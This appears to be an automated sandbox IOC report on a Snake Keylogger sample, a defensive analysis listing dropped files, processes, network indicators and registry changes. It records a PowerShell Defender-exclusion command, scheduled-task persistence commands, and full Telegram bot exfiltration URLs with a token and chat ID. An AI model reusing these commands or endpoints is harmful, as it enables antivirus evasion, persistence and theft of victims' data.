IOC Report
nBank_Report.pif.exe

loading gif

Files

File Path
Type
Category
Malicious
nBank_Report.pif.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nBank_Report.pif.exe.log
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp6F97.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VtPPJdSqnkbmja.e_54ceb08e8bfad9f92dfc1bc5b3988cc6f2cada_8be0a55d_1571f6fa-7dfe-4fa9-a562-830001c7ca32\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EF6.tmp.dmp
Mini DuMP crash report, 15 streams, Thu Sep 26 09:33:40 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER910A.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9188.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VtPPJdSqnkbmja.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1mxjv2f.lly.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbrz1ysr.d2a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwdxhkuf.gqw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uigdoxfc.3su.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmp8A91.tmp
XML 1.0 document, ASCII text
dropped
C:\Users\user\Documents\SnakeKeylogger\Screenshot.png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\nBank_Report.pif.exe
"C:\Users\user\Desktop\nBank_Report.pif.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp"
malicious
C:\Users\user\Desktop\nBank_Report.pif.exe
"C:\Users\user\Desktop\nBank_Report.pif.exe"
malicious
C:\Users\user\Desktop\nBank_Report.pif.exe
"C:\Users\user\Desktop\nBank_Report.pif.exe"
malicious
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp"
malicious
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
"C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2540
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org
unknown
malicious
https://api.telegram.org/bot
unknown
malicious
https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1
149.154.167.220
malicious
https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake
149.154.167.220
malicious
http://checkip.dyndns.org/
132.226.247.73
https://reallyfreegeoip.org/xml/8.46.123.33$
unknown
http://checkip.dyndns.org/q
unknown
http://reallyfreegeoip.org
unknown
https://reallyfreegeoip.org
unknown
http://checkip.dyndns.org
unknown
http://checkip.dyndns.com
unknown
https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.96.3
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://purl.oen
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 6 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.96.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
bg.microsoft.map.fastly.net
199.232.214.172
checkip.dyndns.com
132.226.247.73
windowsupdatebg.s.llnwi.net
87.248.204.0

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.96.3
reallyfreegeoip.org
European Union
malicious
132.226.247.73
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore
DisableSR
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System
DisableCMD
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
FileDirectory
There are 21 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
40CD000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
2A71000
trusted library allocation
page read and write
malicious
7090000
heap
page read and write
malicious
402D000
trusted library allocation
page read and write
malicious
62F0000
heap
page read and write
malicious
4995000
trusted library allocation
page read and write
malicious
2AF9000
trusted library allocation
page read and write
malicious
28A1000
trusted library allocation
page read and write
malicious
3D9E000
trusted library allocation
page read and write
malicious
2B1B000
trusted library allocation
page read and write
malicious
274E000
stack
page read and write
A70000
heap
page read and write
799E000
stack
page read and write
56DE000
stack
page read and write
6830000
trusted library allocation
page read and write
AA6000
heap
page read and write
62AE000
stack
page read and write
1180000
heap
page read and write
619B000
heap
page read and write
13F0000
heap
page read and write
2949000
trusted library allocation
page read and write
1150000
heap
page read and write
4FF0000
heap
page read and write
28C2000
trusted library allocation
page read and write
28C0000
trusted library allocation
page read and write
5B6E000
stack
page read and write
C78000
heap
page read and write
14CF000
stack
page read and write
4DF0000
heap
page read and write
10E4000
trusted library allocation
page read and write
A5AE000
stack
page read and write
3AD9000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
6FE0000
heap
page read and write
5840000
heap
page read and write
2940000
heap
page read and write
5100000
heap
page read and write
5490000
trusted library allocation
page read and write
15A7000
heap
page read and write
104E000
stack
page read and write
65FE000
stack
page read and write
A56E000
stack
page read and write
2AF5000
trusted library allocation
page read and write
54F0000
heap
page execute and read and write
116B000
heap
page read and write
13C0000
trusted library allocation
page read and write
A40000
heap
page read and write
7390000
trusted library allocation
page read and write
4185000
trusted library allocation
page read and write
4E98000
trusted library allocation
page read and write
88B000
stack
page read and write
617000
heap
page read and write
B60000
heap
page read and write
4DD6000
trusted library allocation
page read and write
3FEC000
trusted library allocation
page read and write
408C000
trusted library allocation
page read and write
8020000
trusted library section
page read and write
C0B000
trusted library allocation
page execute and read and write
6375000
heap
page read and write
581D000
stack
page read and write
1657000
heap
page read and write
636D000
heap
page read and write
B78000
unkown
page readonly
646E000
stack
page read and write
603D000
stack
page read and write
530E000
stack
page read and write
14FE000
stack
page read and write
4226000
trusted library allocation
page read and write
A93C000
stack
page read and write
5470000
heap
page read and write
BDD000
trusted library allocation
page execute and read and write
E8A000
stack
page read and write
61AE000
stack
page read and write
5A60000
trusted library allocation
page execute and read and write
1380000
trusted library allocation
page read and write
A6F0000
heap
page read and write
1090000
heap
page read and write
7F9E000
stack
page read and write
294E000
trusted library allocation
page read and write
4D80000
trusted library allocation
page read and write
7F440000
trusted library allocation
page execute and read and write
1590000
trusted library allocation
page read and write
2870000
heap
page read and write
50E000
unkown
page read and write
3E99000
trusted library allocation
page read and write
2993000
trusted library allocation
page read and write
57E0000
heap
page read and write
C48000
heap
page read and write
28E0000
trusted library allocation
page read and write
138A000
trusted library allocation
page execute and read and write
453000
remote allocation
page execute and read and write
51E0000
heap
page execute and read and write
553C000
stack
page read and write
FF0000
heap
page read and write
5860000
heap
page read and write
ABAE000
stack
page read and write
1123000
trusted library allocation
page execute and read and write
4DE0000
trusted library allocation
page read and write
5400000
trusted library allocation
page read and write
15A0000
heap
page read and write
4235000
trusted library allocation
page read and write
3023000
trusted library allocation
page read and write
A36D000
stack
page read and write
A97D000
stack
page read and write
7340000
trusted library allocation
page read and write
6372000
heap
page read and write
A8CE000
stack
page read and write
BC0000
trusted library allocation
page read and write
7C2E000
stack
page read and write
4FB1000
trusted library allocation
page read and write
3FD8000
trusted library allocation
page read and write
55D2000
heap
page read and write
406C000
trusted library allocation
page read and write
6AAC000
stack
page read and write
55A1000
heap
page read and write
4FA5000
trusted library allocation
page read and write
2AD7000
trusted library allocation
page read and write
5980000
heap
page read and write
EAD000
trusted library allocation
page execute and read and write
71F0000
heap
page read and write
6F4C000
stack
page read and write
5460000
trusted library allocation
page execute and read and write
50C0000
heap
page execute and read and write
5690000
heap
page read and write
67F2000
trusted library allocation
page read and write
BD3000
trusted library allocation
page execute and read and write
BF6000
trusted library allocation
page execute and read and write
67C0000
trusted library allocation
page read and write
28C7000
trusted library allocation
page execute and read and write
65BE000
stack
page read and write
AA0000
heap
page read and write
612E000
stack
page read and write
2E4F000
stack
page read and write
544E000
stack
page read and write
132E000
stack
page read and write
5EAF000
stack
page read and write
4DB9000
trusted library allocation
page read and write
134E000
stack
page read and write
3B0C000
trusted library allocation
page read and write
F87000
stack
page read and write
65AE000
stack
page read and write
2E50000
trusted library allocation
page read and write
150E000
stack
page read and write
1600000
trusted library allocation
page read and write
4F00000
heap
page read and write
114E000
heap
page read and write
C30000
heap
page read and write
11FD000
heap
page read and write
5FAD000
unkown
page read and write
28B0000
trusted library allocation
page read and write
120D000
heap
page read and write
1DD000
stack
page read and write
A16D000
stack
page read and write
AF6C000
stack
page read and write
2F20000
heap
page read and write
729E000
stack
page read and write
546F000
stack
page read and write
4FE0000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
13D0000
trusted library allocation
page read and write
725E000
stack
page read and write
56F0000
trusted library allocation
page read and write
3C55000
trusted library allocation
page read and write
5830000
trusted library allocation
page execute and read and write
2E91000
trusted library allocation
page read and write
1166000
heap
page read and write
537B000
trusted library allocation
page read and write
286E000
stack
page read and write
54A8000
heap
page read and write
54E0000
heap
page read and write
4B4C000
stack
page read and write
ABBE000
stack
page read and write
74E000
stack
page read and write
FCE000
stack
page read and write
4A35000
trusted library allocation
page read and write
63C2000
heap
page read and write
4DD4000
trusted library allocation
page read and write
41F3000
trusted library allocation
page read and write
161E000
trusted library allocation
page read and write
EA3000
trusted library allocation
page execute and read and write
1182000
heap
page read and write
29F5000
trusted library allocation
page read and write
2A50000
trusted library allocation
page read and write
739D000
stack
page read and write
7F90000
trusted library section
page read and write
76AE000
stack
page read and write
64AE000
stack
page read and write
1640000
trusted library allocation
page read and write
1130000
trusted library allocation
page read and write
54A0000
trusted library section
page readonly
41A0000
trusted library allocation
page read and write
6EC0000
heap
page execute and read and write
C5A000
heap
page read and write
67A6000
trusted library allocation
page read and write
28BA000
trusted library allocation
page execute and read and write
7209000
heap
page read and write
BF0000
trusted library allocation
page read and write
710D000
heap
page read and write
3E91000
trusted library allocation
page read and write
11D1000
heap
page read and write
1382000
trusted library allocation
page read and write
2890000
heap
page execute and read and write
13AB000
stack
page read and write
7CBE000
stack
page read and write
11A2000
heap
page read and write
2B0E000
trusted library allocation
page read and write
AC2000
unkown
page readonly
51B0000
trusted library allocation
page read and write
820000
heap
page read and write
1560000
trusted library allocation
page read and write
3F31000
trusted library allocation
page read and write
D1F000
heap
page read and write
64BE000
stack
page read and write
28B6000
trusted library allocation
page execute and read and write
5402000
trusted library allocation
page read and write
63B7000
heap
page read and write
C7F000
stack
page read and write
28CB000
trusted library allocation
page execute and read and write
3079000
trusted library allocation
page read and write
29A1000
trusted library allocation
page read and write
67D0000
trusted library allocation
page read and write
BE0000
trusted library allocation
page read and write
FA0000
heap
page read and write
A6AE000
stack
page read and write
1110000
trusted library allocation
page read and write
696A000
stack
page read and write
29ED000
trusted library allocation
page read and write
CF0000
heap
page read and write
1392000
trusted library allocation
page read and write
67DB000
trusted library allocation
page read and write
4DA4000
trusted library allocation
page read and write
11CB000
heap
page read and write
115D000
heap
page read and write
582B000
trusted library allocation
page read and write
139B000
trusted library allocation
page execute and read and write
4FB7000
trusted library allocation
page read and write
A3A000
stack
page read and write
15FF000
stack
page read and write
B7B000
unkown
page readonly
38A1000
trusted library allocation
page read and write
29E1000
trusted library allocation
page read and write
4DC5000
trusted library allocation
page read and write
642E000
stack
page read and write
2A2F000
trusted library allocation
page read and write
7106000
heap
page read and write
5460000
heap
page read and write
63BC000
heap
page read and write
6391000
heap
page read and write
1397000
trusted library allocation
page execute and read and write
54C0000
heap
page read and write
E90000
trusted library allocation
page read and write
4A3E000
stack
page read and write
1117000
trusted library allocation
page execute and read and write
295A000
trusted library allocation
page read and write
2A4B000
trusted library allocation
page read and write
5568000
heap
page read and write
6800000
heap
page read and write
7135000
heap
page read and write
D1F000
heap
page read and write
6F50000
heap
page read and write
735E000
stack
page read and write
BD4000
trusted library allocation
page read and write
5960000
heap
page read and write
5AEE000
stack
page read and write
AC0000
unkown
page readonly
61EE000
stack
page read and write
10FD000
trusted library allocation
page execute and read and write
5370000
trusted library allocation
page read and write
538E000
trusted library allocation
page read and write
D70000
heap
page read and write
29F1000
trusted library allocation
page read and write
53B0000
trusted library allocation
page read and write
62EF000
stack
page read and write
A6ED000
stack
page read and write
5EEE000
stack
page read and write
2A4E000
stack
page read and write
987000
stack
page read and write
4FAE000
trusted library allocation
page read and write
CBC000
heap
page read and write
AFAE000
stack
page read and write
BA8000
unkown
page readonly
5470000
trusted library allocation
page read and write
AE6B000
stack
page read and write
5820000
trusted library allocation
page read and write
A3D000
stack
page read and write
5E6E000
stack
page read and write
5410000
trusted library allocation
page execute and read and write
548E000
stack
page read and write
5710000
heap
page execute and read and write
13B0000
trusted library allocation
page read and write
13B0000
trusted library allocation
page read and write
EB0000
trusted library allocation
page read and write
78E000
stack
page read and write
C40000
heap
page read and write
2A06000
trusted library allocation
page read and write
76E2000
trusted library allocation
page read and write
50CC000
stack
page read and write
1167000
heap
page read and write
67A0000
trusted library allocation
page read and write
5473000
heap
page read and write
A1BD000
stack
page read and write
11B8000
heap
page read and write
2F31000
trusted library allocation
page read and write
638D000
heap
page read and write
4FC2000
trusted library allocation
page read and write
C67000
heap
page read and write
73A0000
trusted library allocation
page execute and read and write
642D000
stack
page read and write
6820000
trusted library allocation
page execute and read and write
5D6E000
stack
page read and write
67D3000
trusted library allocation
page read and write
ABED000
stack
page read and write
6A6D000
stack
page read and write
2AC5000
trusted library allocation
page read and write
38C9000
trusted library allocation
page read and write
29E5000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
70F5000
heap
page read and write
E3A000
stack
page read and write
2A14000
trusted library allocation
page read and write
5540000
heap
page read and write
CD0000
heap
page read and write
5AAE000
stack
page read and write
EC0000
heap
page read and write
111B000
trusted library allocation
page execute and read and write
1350000
trusted library allocation
page execute and read and write
B0AE000
stack
page read and write
C20000
heap
page read and write
2750000
trusted library allocation
page execute and read and write
5660000
trusted library allocation
page execute and read and write
49B8000
trusted library allocation
page read and write
154B000
stack
page read and write
2966000
trusted library allocation
page read and write
626D000
stack
page read and write
4F38000
trusted library allocation
page read and write
3AF4000
trusted library allocation
page read and write
1124000
trusted library allocation
page read and write
4124000
trusted library allocation
page read and write
107E000
stack
page read and write
C6B000
heap
page read and write
BBE000
unkown
page read and write
6AB0000
trusted library allocation
page read and write
A8B0000
heap
page read and write
6AD0000
trusted library allocation
page execute and read and write
564B000
stack
page read and write
7DD000
stack
page read and write
1106000
trusted library allocation
page execute and read and write
BFA000
trusted library allocation
page execute and read and write
480000
heap
page read and write
2760000
heap
page read and write
C02000
trusted library allocation
page read and write
C75000
heap
page read and write
112D000
trusted library allocation
page execute and read and write
70E0000
heap
page read and write
A83C000
stack
page read and write
4DB6000
trusted library allocation
page read and write
160B000
trusted library allocation
page read and write
2964000
trusted library allocation
page read and write
BF2000
trusted library allocation
page read and write
6ED0000
trusted library allocation
page execute and read and write
43A000
stack
page read and write
10BE000
stack
page read and write
29F9000
trusted library allocation
page read and write
A6AD000
stack
page read and write
137D000
trusted library allocation
page execute and read and write
5AF0000
trusted library allocation
page read and write
10D0000
trusted library allocation
page read and write
A5BE000
trusted library allocation
page read and write
1100000
trusted library allocation
page read and write
A50000
heap
page read and write
549C000
heap
page read and write
1373000
trusted library allocation
page read and write
2A4F000
trusted library allocation
page read and write
1173000
heap
page read and write
6EF0000
trusted library allocation
page read and write
520000
heap
page read and write
2F88000
trusted library allocation
page read and write
5561000
heap
page read and write
BD0000
trusted library allocation
page read and write
1570000
trusted library allocation
page read and write
51E3000
heap
page execute and read and write
EBD000
trusted library allocation
page execute and read and write
501D000
stack
page read and write
4F9B000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
C07000
trusted library allocation
page execute and read and write
510000
heap
page read and write
10F3000
trusted library allocation
page read and write
3AFE000
trusted library allocation
page read and write
AAAE000
stack
page read and write
6379000
heap
page read and write
60AE000
stack
page read and write
4F90000
trusted library allocation
page read and write
3F39000
trusted library allocation
page read and write
5DAE000
stack
page read and write
7BBE000
stack
page read and write
400000
remote allocation
page execute and read and write
5440000
heap
page read and write
1370000
trusted library allocation
page read and write
502C000
stack
page read and write
4F9E000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
539D000
trusted library allocation
page read and write
E2E000
stack
page read and write
29A5000
trusted library allocation
page read and write
13C0000
heap
page read and write
9A7000
stack
page read and write
63D9000
heap
page read and write
67B0000
trusted library allocation
page read and write
4D94000
trusted library allocation
page read and write
EA4000
trusted library allocation
page read and write
297E000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
677E000
stack
page read and write
57F0000
heap
page read and write
759E000
stack
page read and write
CFA000
heap
page read and write
28C5000
trusted library allocation
page execute and read and write
9F0000
heap
page read and write
1130000
heap
page read and write
8A9000
stack
page read and write
FB0000
heap
page read and write
CF5000
heap
page read and write
55A5000
heap
page read and write
2AE1000
trusted library allocation
page read and write
A80000
heap
page read and write
410C000
trusted library allocation
page read and write
5650000
heap
page read and write
5C6E000
stack
page read and write
110A000
trusted library allocation
page execute and read and write
AA7E000
stack
page read and write
5374000
trusted library allocation
page read and write
646E000
stack
page read and write
C10000
heap
page read and write
738E000
stack
page read and write
4156000
trusted library allocation
page read and write
7CFE000
stack
page read and write
136E000
stack
page read and write
62EE000
stack
page read and write
1626000
trusted library allocation
page read and write
10ED000
trusted library allocation
page execute and read and write
38A7000
trusted library allocation
page read and write
2930000
trusted library allocation
page execute and read and write
2E80000
heap
page read and write
1138000
heap
page read and write
536D000
stack
page read and write
77AE000
stack
page read and write
75DD000
stack
page read and write
C37000
heap
page read and write
509E000
stack
page read and write
5103000
heap
page read and write
67E0000
trusted library allocation
page execute and read and write
71EE000
stack
page read and write
6361000
heap
page read and write
BBE000
stack
page read and write
10E3000
trusted library allocation
page execute and read and write
602E000
stack
page read and write
1095000
heap
page read and write
2951000
trusted library allocation
page read and write
C3E000
stack
page read and write
1140000
heap
page read and write
4FD0000
trusted library allocation
page read and write
1174000
heap
page read and write
D60000
heap
page read and write
ACEE000
stack
page read and write
A8C1000
heap
page read and write
1390000
trusted library allocation
page read and write
54C5000
heap
page read and write
77EE000
stack
page read and write
3A71000
trusted library allocation
page read and write
4FB0000
trusted library allocation
page read and write
1020000
heap
page read and write
4FD4000
trusted library allocation
page read and write
5880000
heap
page read and write
6AF0000
heap
page read and write
270E000
stack
page read and write
67DD000
trusted library allocation
page read and write
6130000
heap
page read and write
4DD0000
trusted library allocation
page read and write
5543000
heap
page read and write
6F90000
heap
page read and write
1632000
trusted library allocation
page read and write
FFE000
stack
page read and write
2A5D000
trusted library allocation
page read and write
3A99000
trusted library allocation
page read and write
B70000
heap
page read and write
10F0000
trusted library allocation
page read and write
1159000
heap
page read and write
292E000
stack
page read and write
108D000
stack
page read and write
2958000
trusted library allocation
page read and write
1550000
trusted library allocation
page execute and read and write
D67000
heap
page read and write
55A3000
heap
page read and write
F2F000
stack
page read and write
1112000
trusted library allocation
page read and write
1120000
trusted library allocation
page read and write
5FED000
unkown
page read and write
5391000
trusted library allocation
page read and write
299D000
trusted library allocation
page read and write
5A0E000
stack
page read and write
1000000
heap
page read and write
29E9000
trusted library allocation
page read and write
2EFE000
stack
page read and write
5420000
trusted library allocation
page read and write
540E000
stack
page read and write
5FEE000
stack
page read and write
70EE000
stack
page read and write
F37000
stack
page read and write
2A60000
heap
page execute and read and write
6190000
heap
page read and write
5845000
heap
page read and write
2A6B000
trusted library allocation
page read and write
4FBD000
trusted library allocation
page read and write
1650000
heap
page read and write
5850000
heap
page read and write
10FE000
stack
page read and write
1621000
trusted library allocation
page read and write
53F0000
heap
page read and write
A8AD000
stack
page read and write
8AA0000
heap
page read and write
5452000
trusted library allocation
page read and write
1110000
trusted library allocation
page read and write
73A0000
trusted library allocation
page read and write
13E5000
trusted library allocation
page read and write
54B0000
heap
page read and write
4152000
trusted library allocation
page read and write
10E0000
trusted library allocation
page read and write
2B0A000
trusted library allocation
page read and write
56E0000
trusted library section
page read and write
EC7000
heap
page read and write
29DD000
trusted library allocation
page read and write
4AAE000
stack
page read and write
BFF000
unkown
page read and write
113E000
heap
page read and write
AABE000
stack
page read and write
13E0000
trusted library allocation
page read and write
1595000
trusted library allocation
page read and write
5396000
trusted library allocation
page read and write
6DCD000
stack
page read and write
4C4D000
stack
page read and write
78EE000
stack
page read and write
1580000
trusted library allocation
page read and write
28B2000
trusted library allocation
page read and write
5D6E000
stack
page read and write
4AEE000
stack
page read and write
505D000
stack
page read and write
812E000
stack
page read and write
5450000
trusted library section
page readonly
2C2E000
trusted library allocation
page read and write
667E000
stack
page read and write
2946000
trusted library allocation
page read and write
13C6000
trusted library allocation
page read and write
4CE000
unkown
page read and write
6790000
trusted library allocation
page execute and read and write
1386000
trusted library allocation
page execute and read and write
57DD000
stack
page read and write
1102000
trusted library allocation
page read and write
53A0000
trusted library allocation
page read and write
54D0000
heap
page read and write
CE1000
heap
page read and write
719D000
stack
page read and write
2EE8000
trusted library allocation
page read and write
7EF10000
trusted library allocation
page execute and read and write
7DFE000
stack
page read and write
5670000
trusted library allocation
page read and write
1148000
heap
page read and write
11DD000
heap
page read and write
1360000
heap
page execute and read and write
2AE5000
trusted library allocation
page read and write
A370000
heap
page read and write
1176000
heap
page read and write
8AB0000
heap
page read and write
5470000
heap
page read and write
2E70000
heap
page execute and read and write
4FA2000
trusted library allocation
page read and write
610000
heap
page read and write
5450000
trusted library allocation
page read and write
162D000
trusted library allocation
page read and write
3021000
trusted library allocation
page read and write
E8E000
stack
page read and write
63EE000
stack
page read and write
739A000
trusted library allocation
page read and write
2AF1000
trusted library allocation
page read and write
29A9000
trusted library allocation
page read and write
13C4000
trusted library allocation
page read and write
There are 577 hidden memdumps, click here to show them.